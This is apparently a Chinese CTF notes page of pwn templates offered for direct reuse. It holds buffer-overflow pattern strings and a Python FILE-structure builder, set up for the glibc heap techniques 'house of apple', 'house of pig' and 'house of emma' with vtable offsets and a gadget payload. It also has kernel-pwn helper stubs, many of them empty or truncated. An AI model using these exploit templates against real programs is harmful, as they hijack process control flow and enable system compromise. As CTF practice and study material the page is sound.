NOTES
我把一些有用的template和payload放在这里可以直接拿来使用。
USER PWN
- overflow help string
AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEEFFFFFFFFGGGGGGGGHHHHHHHHIIIIIIIIJJJJJJJJKKKKKKKKLLLLLLLLMMMMMMMMNNNNNNNNOOOOOOOOPPPPPPPPQQQQQQQQRRRRRRRRSSSSSSSSTTTTTTTTUUUUUUUUVVVVVVVVWWWWWWWWXXXXXXXXYYYYYYYYZZZZZZZZaaaaaaaabbbbbbbbccccccccddddddddeeeeeeeeffffffffgggggggghhhhhhhhiiiiiiiijjjjjjjjkkkkkkkkllllllllmmmmmmmmnnnnnnnnooooooooppppppppqqqqqqqqrrrrrrrrssssssssttttttttuuuuuuuuvvvvvvvvwwwwwwwwxxxxxxxxyyyyyyyyzzzzzzzz
AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZaaaabbbbccccddddeeeeffffgggghhhhiiiijjjjkkkkllllmmmmnnnnooooppppqqqqrrrrssssttttuuuuvvvvwwwwxxxxyyyyzzzz
- exp template
1 | #!/usr/bin/env python |
- shellcode
1 |
|
- useful segment
1 | payload = "" |
- utils
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68class FILE:
def __init__(self):
self.flags = 0
self.IO_read_ptr = 0
self.IO_read_end = 0
self.IO_read_base = 0
self.IO_write_base = 0
self.IO_write_ptr = 0
self.IO_write_end = 0
self.IO_buf_base = 0
self.IO_buf_end = 0
self.IO_save_base = 0
self.IO_backup_base = 0
self.IO_save_end = 0
self.markers = 0
self.chain = 0
self.fileno = 0
self.flags2 = 0
self.old_offset = 0
self.cur_column = 0
self.vtable_offset = 0
self.shortbuf = 0
self.lock = 0
self.offset = 0
self.codecvt = 0
self.wide_data = 0
self.freeres_list = 0
self.freeres_buf = 0
self.pad5 = 0
self.mode = 0
self.unused2 = ""
self.vtable = 0
def __str__(self):
ret = ""
ret += p64(self.flags) + p64(self.IO_read_ptr) + p64(self.IO_read_end) + p64(self.IO_read_base)
ret += p64(self.IO_write_base) + p64(self.IO_write_ptr) + p64(self.IO_write_end) + p64(self.IO_buf_base)
ret += p64(self.IO_buf_end) + p64(self.IO_save_base) + p64(self.IO_backup_base) + p64(self.IO_save_end)
ret += p64(self.markers) + p64(self.chain) + p32(self.fileno) + p32(self.flags2) + p64(self.old_offset)
ret += p16(self.cur_column) + p8(self.vtable_offset) + p8(self.shortbuf) + p32(0) + p64(self.lock) + p64(self.offset)
ret += p64(self.codecvt) + p64(self.wide_data) + p64(self.freeres_list) + p64(self.freeres_buf) + p64(self.pad5)
ret += p32(self.mode) + self.unused2.ljust(20, "\x00")
ret += p64(self.vtable)
return ret
# house of apple
file = FILE()
file.IO_write_ptr = 0xdead # a big num
file.vtable = libc.address + 0x1e1c60 # pointer to _IO_wstrn_jumps
file.wide_data = libc.address + 0x1ed600 + 0x30 # pointer to pointer_guard
file.flags2 = 8
file.chain = heap + 0x2a0 # link to next file
# house of pig
file = FILE()
file.IO_write_ptr = 0xdead # a big num
file.vtable = libc.address + 0x1e9560 # offset to _IO_str_jumps
file.IO_buf_base = heap + 0x13198 # pointer to prepared buf
file.IO_buf_end = file.IO_buf_base + 0x1e # 0x1e = (size - 100) / 2
# house of emma
file = FILE()
file.lock = heap # writtable
file.vtable = libc.address + 0x215b80 + 0x50 # offset to _IO_cookie_close
payload = str(file)[0x10:]
payload += p64(context_addr) # cookie
payload += p64(mangle(libc.address + \ # mov rdx, [rdi+8]; mov [rsp], rax; call [rdx+0x20]
0x0000000000165d60 + 576, heap+0x2ae0))*4
KERNEL PWN
cpio -i --no-absolute-filenames -F ../rootfs.cpio
- useful segment
1 |
|
- init
1 | cp /proc/kallsyms kallsyms |
- pack.sh
1 | #!/bin/sh |
- gdb.sh
1 |
|
- upload.py
1 | #!/bin/sh |
- kmagic
1 | #!/usr/bin/env python2 |
- kmem_caches
1 | const struct kmalloc_info_struct kmalloc_info[] __initconst = { |